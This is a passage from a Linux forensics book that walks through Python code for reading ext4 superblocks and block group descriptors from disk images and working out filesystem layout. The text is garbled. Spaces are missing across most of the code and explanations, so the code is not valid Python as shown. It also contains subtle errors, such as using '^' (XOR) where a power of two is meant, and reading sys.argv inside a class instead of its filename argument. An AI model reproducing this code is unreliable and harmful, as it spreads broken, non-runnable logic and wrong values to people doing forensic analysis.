self.defaultResUid=getU16(data,0x50)

#GIDforreservedblocks

self.defaultRegGid=getU16(data,0x52)

#forExt4dynamicrevisionLevelsuperblocksonly!

#firstnon-reservedinode

self.firstInode=getU32(data,0x54)

#inodesizeinbytes

self.inodeSize=getU16(data,0x58)

#blockgroupthissuperblockisin

self.blockGroupNumber=getU16(data,0x5a)

#compatiblefeatures

self.compatibleFeatures=getU32(data,0x5c)

self.compatibleFeaturesList=\

getCompatibleFeaturesList(self.compatibleFeatures)

#incompatiblefeatures

self.incompatibleFeatures=getU32(data,0x60)

self.incompatibleFeaturesList=\

getIncompatibleFeaturesList(self.incompatibleFeatures)

#read-onlycompatiblefeatures

self.readOnlyCompatibleFeatures=getU32(data,0x64)

self.readOnlyCompatibleFeaturesList=\

getReadonlyCompatibleFeaturesList(\

self.readOnlyCompatibleFeatures)

#UUIDforvolumeleftasapackedstring

self.uuid=getU128(data,0x68)

#volumename-likelyempty

self.volumeName=data[0x78:0x88].split(“\x00”)[0]

#directorywherelastmounted

self.lastMounted=data[0x88:0xc8].split(“\x00”)[0]

#usedwithcompression

self.algorithmUsageBitmap=getU32(data,0xc8)

#notusedinext4

self.preallocBlocks=getU8(data,0xcc)

#onlyusedwithDIR_PREALLOCfeature

self.preallocDirBlock=getU8(data,0xcd)

#blocksreservedforfutureexpansion

self.reservedGdtBlocks=getU16(data,0xce)

#UUIDofjournalsuperblock

self.journalUuid=getU128(data,0xd0)

#inodenumberofjournalfile

self.journalInode=getU32(data,0xe0)

#devicenumberforjournalifexternaljournalused

self.journalDev=getU32(data,0xe4)

#startoflistoforphanedinodestodelete

self.lastOrphan=getU32(data,0xe8)

self.hashSeed=[]

self.hashSeed.append(getU32(data,0xec))#htreehashseed

self.hashSeed.append(getU32(data,0xf0))

self.hashSeed.append(getU32(data,0xf4))

self.hashSeed.append(getU32(data,0xf8))

#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea

self.hashVersion=getU8(data,0xfc)

self.journalBackupType=getU8(data,0xfd)

#groupdescriptorsizeif64-bitfeatureenabled

self.descriptorSize=getU16(data,0xfe)

self.defaultMountOptions=getU32(data,0x100)

#onlyusedwithmetabgfeature

self.firstMetaBlockGroup=getU32(data,0x104)

#whenwasthefilesystemcreated

self.mkfsTime=time.gmtime(getU32(data,0x108))

self.journalBlocks=[]

#backupcopyofjournalinodesandsizeinlasttwoelements

foriinrange(0,17):

self.journalBlocks.append(getU32(data,0x10c+i*4))

#for64-bitmodeonly

self.blockCountHi=getU32(data,0x150)

self.reservedBlockCountHi=getU32(data,0x154)

self.freeBlocksHi=getU32(data,0x158)

#allinodessuchhaveatleastthismuchspace

self.minInodeExtraSize=getU16(data,0x15c)

#newinodesshouldreservethismanybytes

self.wantInodeExtraSize=getU16(data,0x15e)

#1/2/4signedhash/unsignedhash/testcode

self.miscFlags=getU32(data,0x160)

#logicalblocksreadfromdiskinRAIDbeforemovingtonextdisk

self.raidStride=getU16(data,0x164)

#secondstowaitbetweenmulti-mountchecks

self.mmpInterval=getU16(data,0x166)

#blocknumberforMMPdata

self.mmpBlock=getU64(data,0x168)

#howmanyblocksread/writetillbackonthisdisk

self.raidStripeWidth=getU32(data,0x170)

#groupsperflexgroup

self.groupsPerFlex=2^(getU8(data,0x174))

#shouldbe1forcrc32

self.metadataChecksumType=getU8(data,0x175)

self.reservedPad=getU16(data,0x176)#shouldbezeroes

#kilobyteswrittenforalltime

self.kilobytesWritten=getU64(data,0x178)

#inodeofactivesnapshot

self.snapshotInode=getU32(data,0x180)

#idoftheactivesnapshot

self.snapshotId=getU32(data,0x184)

#blocksreservedforsnapshot

self.snapshotReservedBlocks=getU64(data,0x188)

#inodenumberofheadofsnapshotlist

self.snapshotList=getU32(data,0x190)

self.errorCount=getU32(data,0x194)

#timefirsterrordetected

self.firstErrorTime=time.gmtime(getU32(data,0x198))

self.firstErrorInode=getU32(data,0x19c)#guiltyinode

self.firstErrorBlock=getU64(data,0x1a0)#guiltyblock

#guiltyfunction

self.firstErrorFunction=data[0x1a8:0x1c8].split(“\x00”)[0]

#linenumberwhereerroroccurred

self.firstErrorLine=getU32(data,0x1c8)

#timelasterrordetected

self.lastErrorTime=time.gmtime(getU32(data,0x1cc))

self.lastErrorInode=getU32(data,0x1d0)#guiltyinode

#linenumberwhereerroroccurred

self.lastErrorLine=getU32(data,0x1d4)

self.lastErrorBlock=getU64(data,0x1d8)#guiltyblock

#guiltyfunction

self.lastErrorFunction=data[0x1e0:0x200].split(“\x00”)[0]

#mountoptionsinnull-terminatedstring

self.mountOptions=data[0x200:0x240].split(“\x00”)[0]

#inodeofuserquotafile

self.userQuotaInode=getU32(data,0x240)

#inodeofgroupquotafile

self.groupQuotaInode=getU32(data,0x244)

self.overheadBlocks=getU32(data,0x248)#shouldbezero

self.backupBlockGroups=[getU32(data,0x24c),\

getU32(data,0x250)]#supersparse2only

self.encryptionAlgorithms=[]

foriinrange(0,4):

self.encryptionAlgorithms.append(getU32(data,0x254+i*4))

self.checksum=getU32(data,0x3fc)

defprintState(self):

#0001/0002/0004=cleanlyunmounted/errors/orphans

retVal=“Unknown”

ifself.state==1:

retVal=“Cleanlyunmounted”

elifself.state==2:

retVal=“Errorsdetected”

elifself.state==4:

retVal=“Orphansbeingrecovered”

returnretVal

defprintErrorBehavior(self):

#whenerrors1/2/3continue/read-only/panic

retVal=“Unknown”

ifself.errors==1:

retVal=“Continue”

elifself.errors==2:

retVal=“Remountread-only”

elifself.errors==3:

retVal=“Kernelpanic”

returnretVal

defprintCreator(self):

#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites

retVal=“Unknown”

ifself.creatorOs==0:

retVal=“Linux”

elifself.creatorOs==1:

retVal=“Hurd”

elifself.creatorOs==2:

retVal=“Masix”

elifself.creatorOs==3:

retVal=“FreeBSD”

elifself.creatorOs==4:

retVal=“Lites”

returnretVal

defprintHashAlgorithm(self):

#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea

retVal=“Unknown”

ifself.hashVersion==0:

retVal=“Legacy”

elifself.hashVersion==1:

retVal=“HalfMD4”

elifself.hashVersion==2:

retVal=“Tea”

elifself.hashVersion==3:

retVal=“UnsignedLegacy”

elifself.hashVersion==4:

retVal=“UnsignedHalfMD4”

elifself.hashVersion==5:

retVal=“UnsignedTea”

returnretVal

defprintEncryptionAlgorithms(self):

encList=[]

forvinself.encryptionAlgorithms:

ifv==1:

encList.append(‘256-bitAESinXTSmode’)

elifv==2:

encList.append(‘256-bitAESinGCMmode’)

elifv==3:

encList.append(‘256-bitAESinCBCmode’)

elifv==0:

pass

else:

encList.append(‘Unknown’)

returnencList

defprettyPrint(self):

fork,vinself.__dict__.iteritems():

ifk==‘mountTime’ork==‘writeTime’or\

k==‘lastCheck’ork==‘mkfsTime’or\

k==‘firstErrorTime’ork==‘lastErrorTime’:

printk+”:”,time.asctime(v)

elifk==‘state’:

printk+”:”,self.printState()

elifk==‘errors’:

printk+”:”,self.printErrorBehavior()

elifk==‘uuid’ork==‘journalUuid’:

printk+”:”,printUuid(v)

elifk==‘creatorOs’:

printk+”:”,self.printCreator()

elifk==‘hashVersion’:

printk+”:”,self.printHashAlgorithm()

elifk==‘encryptionAlgorithms’:

printk+”:”,self.printEncryptionAlgorithms()

else:

printk+”:”,v

defusage():

print(“usage“+sys.argv[0]+\

“<imagefile><offsetinsectors>\n”+\

“Readssuperblockfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+\

“cannotbeopennedforreading”)

exit(1)

withopen(sys.argv[1],‘rb’)asf:

f.seek(1024+int(sys.argv[2])*512)

sbRaw=str(f.read(1024))

sb=Superblock(sbRaw)

sb.prettyPrint()

if__name__==“__main__”:

main()

Thisscriptbeginswiththeusualshe-banglinefollowedbyafewimportstatements.IthendefineafewhelperfunctionsgetU32,etc.thattakeapackedstringwithanoptionaloffsetandreturntheappropriatenumericalvalue.Allofthesefunctionsusestruct.unpack.Thesewerecreatedtomakethecodethatfollowsabitcleanerandeasiertoread.

Nextyouwill see theprintUuid functionwhichprints a16byteUUID in the correctformat.This is followedby three functionswhich return listsofstrings representing thecompatible, incompatible, and read-only compatible feature lists. These three functionsusethebitwiseANDoperator,&,totestiftheappropriatebitinoneofthefeaturebitmapsisset.

NextweseethedefinitionfortheSuperblockclass.LikeallproperPythonclasses,thisbegins with a constructor, which you will recall is named __init__ in Python. Theconstructorconsistsofalonglistofcallstothehelperfunctionsdefinedatthebeginningofthescript.Mostof thisconstructor isstraightforward.Afewof thelessobviouslinesarecommented.

Thereareanumberof timefields in thesuperblock.Allof these fieldsstore times insecondssince theepoch (January1,1970,atmidnight).Thesesecondsareconverted totimes by calling time.gmtime(<seconds since epoch>). For example,self.mountTime=time.gmtime(getU32(data,0x2c)) isusedtosetthemountTimevariableintheSuperblockclass.

Thesplitfunctionusedinthisfunctionisnew.Thesplitfunctionisusedtosplitastringonacharacterorsetofcharacters.Thesyntaxforsplitisstring.split(<string>[,<separators>[,<maxsplit]]).Iftheseparatorisnotspecified,thestringissplit on whitespace characters. Lines such as self.volumeName =data[0x78:0x88].split(“\x00”)[0] are used to split a string on a nullcharacter(“\x00”)andkeeponlyeverythingbeforethenullbyte.Thisisdonetopreventrandombytesafterthenullfromcorruptingourvalue.

Inafewcases,anemptylistiscreatedandthentheappendfunctionisusedtoadditemstothelist.Therearealsoafewsizesthatarestoredaspowersoftwo.Withtheexceptionsnotedabove,therearenonewtechniquesasyetundiscussedinthisbook.

TheSuperblockclassthendefinesafewfunctionsthatprintthefilesystemstate,errorbehavior, creator operating system, hash algorithm, and encryption algorithms in a userfriendlyway.TheSuperblockclassendswithaprettyPrintfunctionwhichisusedtoprintout all the information contained within a superblock object. This function uses adictionarywhichisimplicitlydefinedforallPythonobjects.

ForthosenewtoPython,adictionaryisessentiallyalistwithanimportantdifference.Insteadofusing integer indexesasakey toretrieving itemsfromthe list (thevalues),astringisusedas thekey.Whereemptysquarebracketsareusedtodefineanemptylist,emptycurlybracketsareusedtocreateanemptydictionary.Aswithlists,squarebracketsare used to retrieve items. Also, just like lists, items stored in a dictionarymay be ofdifferent types. It shouldbenoted that there is noorder to items in adictionary, so theorderinwhichitemsareaddedisirrelevant.

TheimplicitlydefineddictionaryPythoncreatesforeachobjectiscalled__dict__.Thekeysarethenamesofclassvariablesandthevaluesareofthesametypeaswhateverisstoredintheobject.Thelinefork,vinself.__dict__.iteritems():intheSuperblock.prettyPrintfunctiondemonstratesthesyntaxforcreatingafor loop thatiteratesoveradictionary.Theif/elif/elseblock inprettyPrint isused toprint theitemsthatarenotsimplestringsornumberscorrectly.

The script defines usage and main functions. The if __name__ ==“__main__”:main() at the end of the script allows it to be run or imported intoanother script. The main method opens the image file and then seeks to the proper

location. Recall that the superblock is 1024 bytes long and begins 1024 bytes into thefilesystem. Once the correct bytes have been read, they are passed to the Superblockconstructor on the line sb = Superblock(sbRaw) and then the fields of thesuperblockareprintedonthenextline,sb.prettyPrint().

PartialresultsfromrunningthisnewscriptagainstthePFEsubjectsystemareshowninFigure7.11.ExaminingFigure7.11youwillseethatthesubjectsystemhasthefollowingread-only compatible features: Sparse Super, Large File, Huge File, Group DescriptorTableChecksum,DirectoryNlink,andExtraIsize.UponcomparingthistoFigure7.3youwillseethatTheSleuthKitmissedtwofeatures:GroupDescriptorTableChecksumandDirectoryNlink! In order to continue building the full picture of howour filesystem isorganized,wemustreadtheblockgroupdescriptors.

FIGURE7.11

Partialoutputofscriptthatreadsuperblockinformation.

ReadingblockgroupdescriptorsTheblockgroupdescriptorsaremuchsimplerandsmallerthanthesuperblock.Recallthatthesegroupdescriptorsare32byteslong,unlessanext4filesystemisusing64-bitmode,inwhichcasetheyare64byteslong.ThefollowingcodedefinesaGroupDescriptorclass.AswiththeSuperblockclass,commentsthatwouldnormallybeattheendofalinehavebeenplacedabovethelinetomakethingsmorelegibleinthisbook.classGroupDescriptor():

def__init__(self,data,wide=False):

#/*Blocksbitmapblock*/

self.blockBitmapLo=getU32(data)

#/*Inodesbitmapblock*/

self.inodeBitmapLo=getU32(data,4)

#/*Inodestableblock*/

self.inodeTableLo=getU32(data,8)

#/*Freeblockscount*/

self.freeBlocksCountLo=getU16(data,0xc)

#/*Freeinodescount*/

self.freeInodesCountLo=getU16(data,0xe)

#/*Directoriescount*/

self.usedDirsCountLo=getU16(data,0x10)

#/*EXT4_BG_flags(INODE_UNINIT,etc)*/

self.flags=getU16(data,0x12)

self.flagsList=self.printFlagList()

#/*Excludebitmapforsnapshots*/

self.excludeBitmapLo=getU32(data,0x14)

#/*crc32c(s_uuid+grp_num+bbitmap)LE*/

self.blockBitmapCsumLo=getU16(data,0x18)

#/*crc32c(s_uuid+grp_num+ibitmap)LE*/

self.inodeBitmapCsumLo=getU16(data,0x1a)

#/*Unusedinodescount*/

self.itableUnusedLo=getU16(data,0x1c)

#/*crc16(sb_uuid+group+desc)*/

self.checksum=getU16(data,0x1e)

ifwide==True:

#/*BlocksbitmapblockMSB*/

self.blockBitmapHi=getU32(data,0x20)

#/*InodesbitmapblockMSB*/

self.inodeBitmapHi=getU32(data,0x24)

#/*InodestableblockMSB*/

self.inodeTableHi=getU32(data,0x28)

#/*FreeblockscountMSB*/

self.freeBlocksCountHi=getU16(data,0x2c)

#/*FreeinodescountMSB*/

self.freeInodesCountHi=getU16(data,0x2e)

#/*DirectoriescountMSB*/

self.usedDirsCountHi=getU16(data,0x30)

#/*UnusedinodescountMSB*/

self.itableUnusedHi=getU16(data,0x32)

#/*ExcludebitmapblockMSB*/

self.excludeBitmapHi=getU32(data,0x34)

#/*crc32c(s_uuid+grp_num+bbitmap)BE*/

self.blockBitmapCsumHi=getU16(data,0x38)

#/*crc32c(s_uuid+grp_num+ibitmap)BE*/

self.inodeBitmapCsumHi=getU16(data,0x3a)

self.reserved=getU32(data,0x3c)

defprintFlagList(self):

flagList=[]

#inodetableandbitmaparenotinitialized(EXT4_BG_INODE_UNINIT).

ifself.flags&0x1:

flagList.append(‘InodeUninitialized’)

#blockbitmapisnotinitialized(EXT4_BG_BLOCK_UNINIT).

ifself.flags&0x2:

flagList.append(‘BlockUninitialized’)

#inodetableiszeroed(EXT4_BG_INODE_ZEROED).

ifself.flags&0x4:

flagList.append(‘InodeZeroed’)

returnflagList

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

printk+”:”,v

Thisnewclassisstraightforward.Notethattheconstructortakesanoptionalparameterwhich is used to indicate if 64-bit mode is being used. GroupDescriptor defines aprettyPrintfunctionsimilartotheonefoundinSuperblock.

OnitsowntheGroupDescriptorclassisn’t terriblyuseful.Themainreasonfor this isthatdataisrequiredfromthesuperblocktolocate,read,andinterpretgroupdescriptors.Ihave created a new class called ExtMetadata (for extended metadata) that combinesinformation from the superblock and the block group descriptors in order to solve thisproblem.Thecodeforthisnewclassfollows.classExtMetadata():

def__init__(self,filename,offset):

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+str(filename)+“cannotbeopennedforreading”)

exit(1)

withopen(str(filename),‘rb’)asf:

f.seek(1024+int(offset)*512)

sbRaw=str(f.read(1024))

self.superblock=Superblock(sbRaw)

#readblockgroupdescriptors

self.blockGroups=self.superblock.blockGroups()

ifself.superblock.descriptorSize!=0:

self.wideBlockGroups=True

self.blockGroupDescriptorSize=64

else:

self.wideBlockGroups=False

self.blockGroupDescriptorSize=32

#readingroupdescriptorsstartinginblock1

withopen(str(filename),‘rb’)asf:

f.seek(int(offset)*512+self.superblock.blockSize)

bgdRaw=str(f.read(self.blockGroups*\

self.blockGroupDescriptorSize))

self.bgdList=[]

foriinrange(0,self.blockGroups):

bgd=GroupDescriptor(bgdRaw[i*self.blockGroupDescriptorSize:],\

self.wideBlockGroups)

self.bgdList.append(bgd)

defprettyPrint(self):

self.superblock.prettyPrint()

i=0

forbgdinself.bgdList:

print“Blockgroup:”+str(i)

bgd.prettyPrint()

print“”

i+=1

Theconstructorforthisclassnowcontainsthecodefrommain()inourpreviousscriptthatisusedtoreadthesuperblockfromthediskimagefile.Thereasonforthisisthatweneedthesuperblockinformationinordertoknowhowmuchdatatoreadwhenretrievingthegroupdescriptorsfromtheimagefile.

The constructor first reads the superblock, then creates a Superblock object, uses theinformationfromthesuperblocktocalculatethesizeofthegroupdescriptortable,readsthegroupdescriptortableandpassesthedatatotheGroupDescriptorconstructorinordertobuildalistofGroupDescriptorobjects(insidetheforloop).

Thenewmain()functionbelowhasbecomeverysimple.Itjustchecksfortheexistenceof the image file, calls the ExtMetadata constructor, and then uses theExtMetadata.prettyPrintfunctiontoprinttheresults.defusage():

print(“usage“+sys.argv[0]+\

“<imagefile><offsetinsectors>\n”+\

“Readssuperblock&groupdescriptorsfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopennedforreading”)

exit(1)

emd=ExtMetadata(sys.argv[1],sys.argv[2])

emd.prettyPrint()

if__name__==“__main__”:

main()

PartialoutputforthisnewscriptisshowninFigure7.12.AtthispointourExtMetadataclassisverybasic.Wewillexpandthisclassinthenextsection.

FIGURE7.12

Partialoutputfromascriptthatparsestheblockgroupdescriptortable.

CombiningsuperblockandgroupdescriptorinformationUpuntilthispointwehavetreatedthesuperblockandgroupdescriptorsseparately.Inthelastsectionweusedtheinformationfromthesuperblocktolocatethegroupdescriptors,but thatwastheextent towhichwecombinedinformationfromthesetwoitems.Inthissectionwewill extend the classes introduced previously in this chapter and add a newclasswhichwillallowustodeterminethelayoutofanextendedfilesystem.Wewillstartatthebeginningofthescriptandworkourwaytowardtheenddescribinganythingthatisneworchanged.Notethatunlikemostscriptsinthisbook,Iwilltalkaboutthechanges

and present the complete script at the end of this section. Given the large number ofchanges,thisseemstomakemoresenseforthisscript.

The first change is a new import statement,frommathimportlog, is added.Thisisadifferentformofimportfromwhathasbeenusedthusfar.Thisimportonlypullsinpartofthemathmodule.Thelogfunctionwillbeusedinsomeofthenewcodeinthescript.

A number of new functions have been added. Two convenience functions fordeterminingthenumberofblockgroupsandthegroupdescriptorsizeareamongthenewfunctions.Theircodefollows.defblockGroups(self):

bg=self.totalBlocks/self.blocksPerGroup

ifself.totalBlocks%self.blocksPerGroup!=0:

bg+=1

returnbg

defgroupDescriptorSize(self):

if‘64-bit’inself.incompatibleFeaturesList:

return64

else:

return32

The blockGroups function divides the total blocks by blocks-per-group using integerdivision.Integerdivisioniswhatyoulearnedbackingrammarschoolwheretheanswerwasalwaysanintegerwithpossiblyaremainderifthingsdidn’tdivideevenly.Thenextlineuses themodulus (%)operator.Themodulus is the remainderyouget from integerdivision.Forexample,7%3 is1because7 /3using integerdivision is2remainder1.Thelineifself.totalBlocks%self.blocksPerGroup!=0:effectivelysays“ifthetotalnumberofblocksisnotamultipleoftheblockspergroup,addonetothenumberofblockgroupstoaccountforthelast(smaller)blockgroup.”

ThefollowingnewconveniencefunctionsfortheSuperblockclassarestraightforward.They are used to determine one quantity from another, such as getting the block groupnumberfromaninodeordatablocknumber,etc.defgroupStartBlock(self,bgNo):

returnself.blocksPerGroup*bgNo

defgroupEndBlock(self,bgNo):

returnself.groupStartBlock(bgNo+1)-1

defgroupStartInode(self,bgNo):

returnself.inodesPerGroup*bgNo+1

defgroupEndInode(self,bgNo):

returnself.inodesPerGroup*(bgNo+1)

defgroupFromBlock(self,blockNo):

returnblockNo/self.blocksPerGroup

defgroupIndexFromBlock(self,blockNo):

returnblockNo%self.blocksPerGroup

defgroupFromInode(self,inodeNo):

return(inodeNo-1)/self.inodesPerGroup

defgroupIndexFromInode(self,inodeNo):

return(inodeNo-1)%self.inodesPerGroup

Thefinaladdition to theSuperblockclass is the functiongroupHasSuperblock. Ifyoupassthisfunctionablockgroupnumberitwilltellyou(okay,notliterallytellyou,butitwillreturnavalue)ifthatblockgroupcontainsasuperblockbasedonthefeaturesinuse.Thecodeforthisfunctionfollows.defgroupHasSuperblock(self,bgNo):

#blockgroupzeroalwayshasasuperblock

ifbgNo==0:

returnTrue

retVal=False

if‘MetaBlockGroups’inself.incompatibleFeaturesListand\

bgNo>=self.firstMetaBlockGroup:

#metablockgroupshaveasbandgdtin1stand

#2ndandlastofeachmetagroup

#metablockgroupsizeisblocksize/32

#onlypartoffilesystemmightusethisfeature

mbgSize=self.blockSize/32

retVal=(bgNo%mbgSize==0)or\

((bgNo+1)%mbgSize==0)or\

((bgNo-1)%mbgSize==0)

elif‘SparseSuper2’inself.compatibleFeaturesList:

#twobackupsuperblocksinself.backupBlockGroups

ifbgNo==self.backupBlockGroups[0]or\

bgNo==self.backupBlockGroups[1]:

retVal=True

elif‘SparseSuper’inself.readOnlyCompatibleFeaturesList:

#backupsin1,powersof3,5,and7

retVal=(bgNo==1)or\

(bgNo==pow(3,round(log(bgNo)/log(3))))\

or(bgNo==pow(5,round(log(bgNo)/log(5))))\

or(bgNo==pow(7,round(log(bgNo)/log(7))))

ifretVal:

returnretVal

else:

#ifwegotthisfarwemusthavedefault

#witheverybghavingsbandgdt

retVal=True

returnretVal

Thisfunctionisprimarilyabigif/elif/elseblock.Itbeginswithachecktoseewhethertheblockgroupnumberiszero.Ifso,itimmediatelyreturnsTruebecausethereisalwaysasuperblockinthefirstgroup.

NextwecheckfortheMetaBlockGroupsfeature.Recallthatthisfeaturebreaksupthefilesystemintometagroups.Themetagroupsarelikelittlelogicalfilesystemsinthatthegroupdescriptorsonlypertaintoblockgroupswithinthemetagroup.Thisallowslargerfilesystems tobecreated.When this feature isenabled, there isa superblockandgroupdescriptortableinthefirst,secondandlastblockgroupswithinthemetagroup.Themetagroupsalwayshaveasizeofblocksize/32.Also,themetablockgroupmayonlyapplytopartofthedisk,soacheckismadetoensurethatweareintheregionwheremetagroupsexist.

Next,wecheckfortheSparseSuper2feature.Thisfeaturestoresbackupsuperblocksintwogroupslistedinthesuperblock.ThenextcheckisfortheSparseSuperfeature.Ifthisfeatureisinuse,thebackupsuperblocksareingroup1andgroupsthatarepowersof3,5,or7.This iswhere the logarithmfunction importedearliercomes in.Foranynumbernthatisanevenpowerofx,xrounded(log(n)/log(x))shouldequaln.

The GroupDescriptor class is unchanged. We add a new class,ExtendedGroupDescriptor,whichcombines informationfromoursuperblockwithgroupdescriptorstomorefullydescribetheblockgroup.ThisnewclassaddslayoutinformationtowhatisfoundinthegenericGroupDescriptorclass.SomemightquestionwhyIchosenot to have the ExtendedGroupDescriptor class inherit from (or extend) theGroupDescriptor class. The primary reason I did not do so is that theGroupDescriptorclass is littlemore than a structure for storing rawdata found on the disk,whereas theExtendedGroupDescriptorhasmoremeaningfuldatamembers that arederived from therawvalues.Thecodeforthisnewclassfollows.classExtendedGroupDescriptor():

def__init__(self,bgd,sb,bgNo):

self.blockGroup=bgNo

self.startBlock=sb.groupStartBlock(bgNo)

self.endBlock=sb.groupEndBlock(bgNo)

self.startInode=sb.groupStartInode(bgNo)

self.endInode=sb.groupEndInode(bgNo)

self.flags=bgd.printFlagList()

self.freeInodes=bgd.freeInodesCountLo

ifbgd.wide:

self.freeInodes+=bgd.freeInodesCountHi*pow(2,16)

self.freeBlocks=bgd.freeBlocksCountLo

ifbgd.wide:

self.freeBlocks+=bgd.freeBlocksCountHi*pow(2,16)

self.directories=bgd.usedDirsCountLo

ifbgd.wide:

self.directories+=bgd.usedDirsCountHi*pow(2,16)

self.checksum=bgd.checksum

self.blockBitmapChecksum=bgd.blockBitmapCsumLo

ifbgd.wide:

self.blockBitmapChecksum+=bgd.blockBitmapCsumHi*pow(2,16)

self.inodeBitmapChecksum=bgd.inodeBitmapCsumLo

ifbgd.wide:

self.inodeBitmapChecksum+=bgd.inodeBitmapCsumHi*pow(2,16)

#nowfigureoutthelayoutandstoreitinalist(withlistsinside)

self.layout=[]

self.nonDataBlocks=0

#forflexibleblockgroupsmustmakeanadjustment

fbgAdj=1

if‘FlexibleBlockGroups’insb.incompatibleFeaturesList:

#onlyfirstgroupinflexblockaffected

ifbgNo%sb.groupsPerFlex==0:

fbgAdj=sb.groupsPerFlex

ifsb.groupHasSuperblock(bgNo):

self.layout.append([‘Superblock’,self.startBlock,\

self.startBlock])

gdSize=sb.groupDescriptorSize()*sb.blockGroups()/

sb.blockSize

self.layout.append([‘GroupDescriptorTable’,\

self.startBlock+1,self.startBlock+gdSize])

self.nonDataBlocks+=gdSize+1

ifsb.reservedGdtBlocks>0:

self.layout.append([‘ReservedGDTBlocks’,\

self.startBlock+gdSize+1,\

self.startBlock+gdSize+sb.reservedGdtBlocks])

self.nonDataBlocks+=sb.reservedGdtBlocks

bbm=bgd.blockBitmapLo

ifbgd.wide:

bbm+=bgd.blockBitmapHi*pow(2,32)

self.layout.append([‘DataBlockBitmap’,bbm,bbm])

#isblockbitmapinthisgroup(notflexblockgroup,etc)

ifsb.groupFromBlock(bbm)==bgNo:

self.nonDataBlocks+=fbgAdj

ibm=bgd.inodeBitmapLo

ifbgd.wide:

ibm+=bgd.inodeBitmapHi*pow(2,32)

self.layout.append([‘InodeBitmap’,ibm,ibm])

#isinodebitmapinthisgroup?

ifsb.groupFromBlock(ibm)==bgNo:

self.nonDataBlocks+=fbgAdj

it=bgd.inodeTableLo

ifbgd.wide:

it+=bgd.inodeTableHi*pow(2,32)

itBlocks=(sb.inodesPerGroup*sb.inodeSize)/sb.blockSize

self.layout.append([‘InodeTable’,it,it+itBlocks-1])

#isinodetableinthisgroup?

ifsb.groupFromBlock(it)==bgNo:

self.nonDataBlocks+=itBlocks*fbgAdj

self.layout.append([‘DataBlocks’,self.startBlock\

+self.nonDataBlocks,self.endBlock])

defprettyPrint(self):

print“”

print‘BlockGroup:‘+str(self.blockGroup)

print‘Flags:%r‘%self.flags

print‘Blocks:%s-%s‘%(self.startBlock,self.endBlock)

print‘Inodes:%s-%s‘%(self.startInode,self.endInode)

print‘Layout:’

foriteminself.layout:

print‘%s%s-%s’%(item[0],item[1],item[2])

print‘FreeInodes:%u‘%self.freeInodes

print‘FreeBlocks:%u‘%self.freeBlocks

print‘Directories:%u‘%self.directories

print‘Checksum:0x%x‘%self.checksum

print‘BlockBitmapChecksum:0x%x‘%self.blockBitmapChecksum

print‘InodeBitmapChecksum:0x%x‘%self.inodeBitmapChecksum

Thereareafewthingsintheconstructorthatmightrequiresomeexplanation.Youwillsee lines that readifbgd.wide: followinganassignment,where if the statement istrue (wideor64-bitmode inuse),anothervaluemultipliedby216or232 isadded to thenewly assigned value. This allows the raw values stored in two fields of the groupdescriptorsfor64-bitfilesystemstobestoredproperlyinasinglevalue.

Recall thatwhile certain blockgroupsmaybemissing some items, the itemorder ofwhat is present is always superblock, group descriptor table, reserved group descriptorblocks,datablockbitmap, inodebitmap, inodetable,anddatablocks.Beforebuildinga

listcalledlayoutwhichisalistoflistscontainingadescriptor,startblock,andendblock,theconstructorchecksfortheFlexibleBlockGroupsfeature.

Asareminder,thisfeatureallowsthemetadatafromaflexiblegrouptobestoredinthefirstblockgroupwithintheflexgroup.Becausethefirstblockgroupstoresallthegroupdescriptors,bitmaps,andinodesfortheentireflexgroup,anadjustmentfactor,fbgAdj,issettothenumberofgroupsinaflexgroupinordertoaddthecorrectnumberofblockstothe layout of the block group. Themodulus (%) operator is used in this constructor todeterminewhetherweareatthebeginningofaflexiblegroup.Onceyouunderstandtheflexibleblockgroupadjustmentcalculation,theconstructorbecomeseasytounderstand.

The prettyPrint function in the ExtendedGroupDescriptor class is straightforward.Asmentionedearlierinthisbook,TheSleuthKitseemstobeabitoutofdate.Wehaveseenfeaturesthatitdoesnotreport.Italsowillnotreportthetwobitmapchecksumsattheendof the prettyPrint function in the ExtendedGroupDescriptor class. The only remainingchange to our script is to modify the ExtMetadata class to storeExtendedGroupDescriptors instead ofGroupDescriptors. The final version of this scriptfollows.#!/usr/bin/python

#

#extfs.py

#

#ThisisasimplePythonscriptthatwill

#getmetadatafromanext2/3/4filesysteminside

#ofanimagefile.

#

#DevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

importsys

importos.path

importsubprocess

importstruct

importtime

frommathimportlog

#thesearesimplefunctionstomakeconversionseasier

defgetU32(data,offset=0):

returnstruct.unpack(‘<L’,data[offset:offset+4])[0]

defgetU16(data,offset=0):

returnstruct.unpack(‘<H’,data[offset:offset+2])[0]

defgetU8(data,offset=0):

returnstruct.unpack(‘B’,data[offset:offset+1])[0]

defgetU64(data,offset=0):

returnstruct.unpack(‘<Q’,data[offset:offset+8])[0]

#thisfunctiondoesn’tunpackthestringbecause

#itisn’treallyanumberbutaUUID

defgetU128(data,offset=0):

returndata[offset:offset+16]

defprintUuid(data):

retStr=format(struct.unpack(‘<Q’,data[8:16])[0],\

‘X’).zfill(16)+\

format(struct.unpack(‘<Q’,data[0:8])[0],‘X’).zfill(16)

returnretStr

defgetCompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘DirectoryPreallocate’)

ifu32&0x2:

retList.append(‘ImagicInodes’)

ifu32&0x4:

retList.append(‘HasJournal’)

ifu32&0x8:

retList.append(‘ExtendedAttributes’)

ifu32&0x10:

retList.append(‘ResizeInode’)

ifu32&0x20:

retList.append(‘DirectoryIndex’)

ifu32&0x40:

retList.append(‘LazyBlockGroups’)

ifu32&0x80:

retList.append(‘ExcludeInode’)

ifu32&0x100:

retList.append(‘ExcludeBitmap’)

ifu32&0x200:

retList.append(‘SparseSuper2’)

returnretList

defgetIncompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘Compression’)

ifu32&0x2:

retList.append(‘Filetype’)

ifu32&0x4:

